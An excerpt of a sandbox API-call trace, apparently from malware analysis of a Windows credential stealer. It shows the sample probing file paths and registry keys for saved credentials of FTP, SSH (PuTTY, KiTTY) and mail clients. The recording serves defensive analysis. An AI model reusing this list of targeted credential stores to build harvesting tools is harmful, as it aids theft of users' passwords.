(HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.899] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.899] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\ProgramData") returned 0x0 [0314.899] GetProcessHeap () returned 0x780000 [0314.899] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f58) returned 0x79b520 [0314.900] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.901] wvsprintfW (in: param_1=0x79b520, param_2="%s\\Syncovery", arglist=0x19fb94 | out: param_1="C:\\ProgramData\\Syncovery") returned 24 [0314.901] GetProcessHeap () returned 0x780000 [0314.901] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x34) returned 0x78d388 [0314.901] GetProcessHeap () returned 0x780000 [0314.901] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.902] PathFileExistsW (pszPath="C:\\ProgramData\\Syncovery") returned 0 [0314.903] GetProcessHeap () returned 0x780000 [0314.903] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.903] GetProcessHeap () returned 0x780000 [0314.903] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78d388 | out: hHeap=0x780000) returned 1 [0314.903] GetProcessHeap () returned 0x780000 [0314.903] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.904] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.905] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0314.905] GetProcessHeap () returned 0x780000 [0314.905] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b520 [0314.905] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.906] wvsprintfW (in: param_1=0x79b520, param_2="%s\\FreshWebmaster\\FreshFTP\\FtpSites.SMF", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FreshWebmaster\\FreshFTP\\FtpSites.SMF") returned 59 [0314.906] GetProcessHeap () returned 0x780000 [0314.906] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7a) returned 0x79a550 [0314.906] GetProcessHeap () returned 0x780000 [0314.907] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.907] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.907] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FreshWebmaster\\FreshFTP\\FtpSites.SMF") returned 0 [0314.908] GetProcessHeap () returned 0x780000 [0314.908] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0314.908] GetProcessHeap () returned 0x780000 [0314.909] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.909] GetProcessHeap () returned 0x780000 [0314.909] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x79b520 [0314.909] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.910] wvsprintfW (in: param_1=0x79b520, param_2="%s\\BitKinex\\bitkinex.ds", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BitKinex\\bitkinex.ds") returned 58 [0314.910] GetProcessHeap () returned 0x780000 [0314.910] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x78) returned 0x797190 [0314.910] GetProcessHeap () returned 0x780000 [0314.911] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.912] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BitKinex\\bitkinex.ds") returned 0 [0314.912] GetProcessHeap () returned 0x780000 [0314.912] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797190 | out: hHeap=0x780000) returned 1 [0314.912] GetProcessHeap () returned 0x780000 [0314.912] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6a) returned 0x79b520 [0314.913] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.914] wvsprintfW (in: param_1=0x79b520, param_2="%s\\UltraFXP\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UltraFXP\\sites.xml") returned 56 [0314.914] GetProcessHeap () returned 0x780000 [0314.914] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x74) returned 0x797710 [0314.914] GetProcessHeap () returned 0x780000 [0314.915] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.915] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.915] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UltraFXP\\sites.xml") returned 0 [0314.916] GetProcessHeap () returned 0x780000 [0314.916] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797710 | out: hHeap=0x780000) returned 1 [0314.916] GetProcessHeap () returned 0x780000 [0314.916] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f68) returned 0x79b520 [0314.918] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.919] wvsprintfW (in: param_1=0x79b520, param_2="%s\\FTP Now\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTP Now\\sites.xml") returned 55 [0314.919] GetProcessHeap () returned 0x780000 [0314.919] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x72) returned 0x797b10 [0314.919] GetProcessHeap () returned 0x780000 [0314.920] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.920] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.921] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTP Now\\sites.xml") returned 0 [0314.921] GetProcessHeap () returned 0x780000 [0314.921] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797b10 | out: hHeap=0x780000) returned 1 [0314.921] GetProcessHeap () returned 0x780000 [0314.921] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79b520 [0314.922] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.922] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\VanDyke\\SecureFX", pszValue="Config Path", pdwType=0x0, pvData=0x79b520, pcbData=0x19fba8*=0x104 | out: pdwType=0x0, pvData=0x79b520, pcbData=0x19fba8*=0x104) returned 0x2 [0314.922] GetProcessHeap () returned 0x780000 [0314.923] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.923] GetProcessHeap () returned 0x780000 [0314.923] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.923] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.924] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0314.924] GetProcessHeap () returned 0x780000 [0314.924] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b520 [0314.925] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.925] wvsprintfW (in: param_1=0x79b520, param_2="%s\\Odin Secure FTP Expert\\QFDefault.QFQ", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Odin Secure FTP Expert\\QFDefault.QFQ") returned 59 [0314.925] GetProcessHeap () returned 0x780000 [0314.925] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7a) returned 0x79a550 [0314.925] GetProcessHeap () returned 0x780000 [0314.926] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.927] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.927] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Odin Secure FTP Expert\\QFDefault.QFQ") returned 0 [0314.927] GetProcessHeap () returned 0x780000 [0314.927] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0314.927] GetProcessHeap () returned 0x780000 [0314.928] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.928] GetProcessHeap () returned 0x780000 [0314.928] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.930] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.931] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0314.931] GetProcessHeap () returned 0x780000 [0314.931] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8c) returned 0x79b520 [0314.938] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.938] wvsprintfW (in: param_1=0x79b520, param_2="%s\\Odin Secure FTP Expert\\SiteInfo.QFP", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\Odin Secure FTP Expert\\SiteInfo.QFP") returned 58 [0314.938] GetProcessHeap () returned 0x780000 [0314.938] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x78) returned 0x797410 [0314.938] GetProcessHeap () returned 0x780000 [0314.939] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.940] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Odin Secure FTP Expert\\SiteInfo.QFP") returned 0 [0314.940] GetProcessHeap () returned 0x780000 [0314.940] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797410 | out: hHeap=0x780000) returned 1 [0314.940] GetProcessHeap () returned 0x780000 [0314.940] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.940] GetProcessHeap () returned 0x780000 [0314.940] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e8) returned 0x79b520 [0314.940] GetProcessHeap () returned 0x780000 [0314.940] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b640 [0314.940] GetProcessHeap () returned 0x780000 [0314.941] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b4e0 [0314.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.942] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\NCH Software\\Fling\\Accounts", phkResult=0x79b4e0 | out: phkResult=0x79b4e0*=0x0) returned 0x2 [0314.942] GetProcessHeap () returned 0x780000 [0314.942] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b4e0 | out: hHeap=0x780000) returned 1 [0314.942] GetProcessHeap () returned 0x780000 [0314.942] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b400 [0314.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.943] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\NCH Software\\Fling\\Accounts", phkResult=0x79b400 | out: phkResult=0x79b400*=0x0) returned 0x2 [0314.943] GetProcessHeap () returned 0x780000 [0314.943] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b400 | out: hHeap=0x780000) returned 1 [0314.943] GetProcessHeap () returned 0x780000 [0314.944] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.944] GetProcessHeap () returned 0x780000 [0314.944] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b640 | out: hHeap=0x780000) returned 1 [0314.944] GetProcessHeap () returned 0x780000 [0314.944] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e8) returned 0x79b520 [0314.944] GetProcessHeap () returned 0x780000 [0314.944] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b640 [0314.944] GetProcessHeap () returned 0x780000 [0314.944] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b4d0 [0314.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.945] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\NCH Software\\ClassicFTP\\FTPAccounts", phkResult=0x79b4d0 | out: phkResult=0x79b4d0*=0x0) returned 0x2 [0314.945] GetProcessHeap () returned 0x780000 [0314.945] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b4d0 | out: hHeap=0x780000) returned 1 [0314.945] GetProcessHeap () returned 0x780000 [0314.945] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b4e0 [0314.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.946] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\NCH Software\\ClassicFTP\\FTPAccounts", phkResult=0x79b4e0 | out: phkResult=0x79b4e0*=0x0) returned 0x2 [0314.946] GetProcessHeap () returned 0x780000 [0314.947] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b4e0 | out: hHeap=0x780000) returned 1 [0314.947] GetProcessHeap () returned 0x780000 [0314.947] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.947] GetProcessHeap () returned 0x780000 [0314.947] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b640 | out: hHeap=0x780000) returned 1 [0314.947] GetProcessHeap () returned 0x780000 [0314.947] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e8) returned 0x79b520 [0314.947] GetProcessHeap () returned 0x780000 [0314.947] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b640 [0314.947] GetProcessHeap () returned 0x780000 [0314.947] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b490 [0314.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.948] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\9bis.com\\KiTTY\\Sessions", phkResult=0x79b490 | out: phkResult=0x79b490*=0x0) returned 0x2 [0314.948] GetProcessHeap () returned 0x780000 [0314.948] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b490 | out: hHeap=0x780000) returned 1 [0314.948] GetProcessHeap () returned 0x780000 [0314.948] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b4e0 [0314.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.949] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\SimonTatham\\PuTTY\\Sessions", phkResult=0x79b4e0 | out: phkResult=0x79b4e0*=0x0) returned 0x2 [0314.950] GetProcessHeap () returned 0x780000 [0314.950] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b4e0 | out: hHeap=0x780000) returned 1 [0314.950] GetProcessHeap () returned 0x780000 [0314.950] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b390 [0314.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.951] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\SimonTatham\\PuTTY\\Sessions", phkResult=0x79b390 | out: phkResult=0x79b390*=0x0) returned 0x2 [0314.951] GetProcessHeap () returned 0x780000 [0314.951] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b390 | out: hHeap=0x780000) returned 1 [0314.951] GetProcessHeap () returned 0x780000 [0314.951] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b3c0 [0314.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.952] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\9bis.com\\KiTTY\\Sessions", phkResult=0x79b3c0 | out: phkResult=0x79b3c0*=0x0) returned 0x2 [0314.952] GetProcessHeap () returned 0x780000 [0314.952] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b3c0 | out: hHeap=0x780000) returned 1 [0314.952] GetProcessHeap () returned 0x780000 [0314.953] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.953] GetProcessHeap () returned 0x780000 [0314.953] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b640 | out: hHeap=0x780000) returned 1 [0314.953] GetProcessHeap () returned 0x780000 [0314.953] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79b520 [0314.953] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.954] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Mozilla Thunderbird", pszValue="CurrentVersion", pdwType=0x0, pvData=0x79b520, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x79b520, pcbData=0x19fba4*=0x104) returned 0x2 [0314.954] GetProcessHeap () returned 0x780000 [0314.954] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.954] GetProcessHeap () returned 0x780000 [0314.954] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x79b520 [0314.955] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.955] wvsprintfW (in: param_1=0x79b520, param_2="%s\\Foxmail\\mail", arglist=0x19fbb8 | out: param_1="C:\\Program Files (x86)\\Foxmail\\mail") returned 35 [0314.955] GetProcessHeap () returned 0x780000 [0314.955] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4a) returned 0x79a2e8 [0314.955] GetProcessHeap () returned 0x780000 [0314.956] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.956] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Foxmail\\mail") returned 0 [0314.956] GetProcessHeap () returned 0x780000 [0314.957] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.957] GetProcessHeap () returned 0x780000 [0314.957] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.957] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x79a2e8, nSize=0x104 | out: lpDst="C:") returned 0x3 [0314.958] Sleep (dwMilliseconds=0xa) [0314.984] GetProcessHeap () returned 0x780000 [0314.984] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79b520 [0314.984] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.985] wvsprintfW (in: param_1=0x79b520, param_2="%s\\%s", arglist=0x19f938 | out: param_1="C:\\Foxmail*") returned 11 [0314.985] GetProcessHeap () returned 0x780000 [0314.985] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x1a) returned 0x7931e8 [0314.985] GetProcessHeap () returned 0x780000 [0314.985] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.986] FindFirstFileW (in: lpFileName="C:\\Foxmail*" (normalized: "c:\\foxmail*"), lpFindFileData=0x19f94c | out: lpFindFileData=0x19f94c*(dwFileAttributes=0x560055, ftCreationTime.dwLowDateTime=0x580057, ftCreationTime.dwHighDateTime=0x5a0059, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x620061, ftLastWriteTime.dwLowDateTime=0x640063, ftLastWriteTime.dwHighDateTime=0x660065, nFileSizeHigh=0x680067, nFileSizeLow=0x6a0069, dwReserved0=0x6c006b, dwReserved1=0x6e006d, cFileName="opqr\x08", cAlternateFileName="ꋨyĄ")) returned 0xffffffff [0314.986] GetProcessHeap () returned 0x780000 [0314.986] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7931e8 | out: hHeap=0x780000) returned 1 [0314.986] GetProcessHeap () returned 0x780000 [0314.986] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.986] GetProcessHeap () returned 0x780000 [0314.987] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f70) returned 0x79b520 [0314.987] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.988] wvsprintfW (in: param_1=0x79b520, param_2="%s\\Pocomail\\accounts.ini", arglist=0x19fb5c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Pocomail\\accounts.ini") returned 59 [0314.988] GetProcessHeap () returned 0x780000 [0314.988] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7a) returned 0x79a2e8 [0314.988] GetProcessHeap () returned 0x780000 [0314.989] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.991] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.991] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Pocomail\\accounts.ini") returned 0 [0314.991] GetProcessHeap () returned 0x780000 [0314.992] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.992] GetProcessHeap () returned 0x780000 [0314.992] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.992] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.993] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0314.993] GetProcessHeap () returned 0x780000 [0314.993] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f70) returned 0x79b520 [0314.994] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.995] wvsprintfW (in: param_1=0x79b520, param_2="%s\\Pocomail\\accounts.ini", arglist=0x19fb50 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Pocomail\\accounts.ini") returned 53 [0314.995] GetProcessHeap () returned 0x780000 [0314.996] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x6e) returned 0x79a550 [0314.996] GetProcessHeap () returned 0x780000 [0314.996] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.997] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.997] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\Pocomail\\accounts.ini") returned 0 [0314.997] GetProcessHeap () returned 0x780000 [0314.998] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0314.998] GetProcessHeap () returned 0x780000 [0314.998] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.998] GetProcessHeap () returned 0x780000 [0314.998] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e8) returned 0x79b520 [0314.998] GetProcessHeap () returned 0x780000 [0314.999] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b640 [0314.999] GetProcessHeap () returned 0x780000 [0314.999] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b4d0 [0314.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.000] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\IncrediMail\\Identities", phkResult=0x79b4d0 | out: phkResult=0x79b4d0*=0x0) returned 0x2 [0315.000] GetProcessHeap () returned 0x780000 [0315.000] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b4d0 | out: hHeap=0x780000) returned 1 [0315.000] GetProcessHeap () returned 0x780000 [0315.000] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b480 [0315.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.001] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\IncrediMail\\Identities", phkResult=0x79b480 | out: phkResult=0x79b480*=0x0) returned 0x2 [0315.001] GetProcessHeap () returned 0x780000 [0315.001] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b480 | out: hHeap=0x780000) returned 1 [0315.001] GetProcessHeap () returned 0x780000 [0315.002] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0315.002] GetProcessHeap () returned 0x780000 [0315.002] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b640 | out: hHeap=0x780000) returned 1 [0315.002] GetProcessHeap () returned 0x780000 [0315.002] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x79b520 [0315.003] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.003] wvsprintfW (in: param_1=0x79b520, param_2="%s\\GmailNotifierPro\\ConfigData.xml", arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GmailNotifierPro\\ConfigData.xml") returned 69 [0315.003] GetProcessHeap () returned 0x780000 [0315.003] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x8e) returned 0x79a2e8 [0315.004] GetProcessHeap () returned 0x780000 [0315.004] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0315.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.005] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GmailNotifierPro\\ConfigData.xml") returned 0 [0315.005] GetProcessHeap () returned 0x780000 [0315.005] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0315.006] GetProcessHeap () returned 0x780000 [0315.006] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0315.006] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0315.007] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0315.007] GetProcessHeap () returned 0x780000 [0315.007] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6a) returned 0x79b520 [0315.007] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.008] wvsprintfW (in: param_1=0x79b520, param_2="%s\\DeskSoft\\CheckMail", arglist=0x19fb3c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DeskSoft\\CheckMail") returned 56 [0315.008] GetProcessHeap () returned 0x780000 [0315.008] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x74) returned 0x797610 [0315.008] GetProcessHeap () returned 0x780000 [0315.009] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0315.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.010] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DeskSoft\\CheckMail") returned 0 [0315.010] GetProcessHeap () returned 0x780000 [0315.010] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0315.010] GetProcessHeap () returned 0x780000 [0315.010] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797610 | out: hHeap=0x780000) returned 1 [0315.011] GetProcessHeap () returned 0x780000 [0315.011] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0315.011] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0315.012] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: 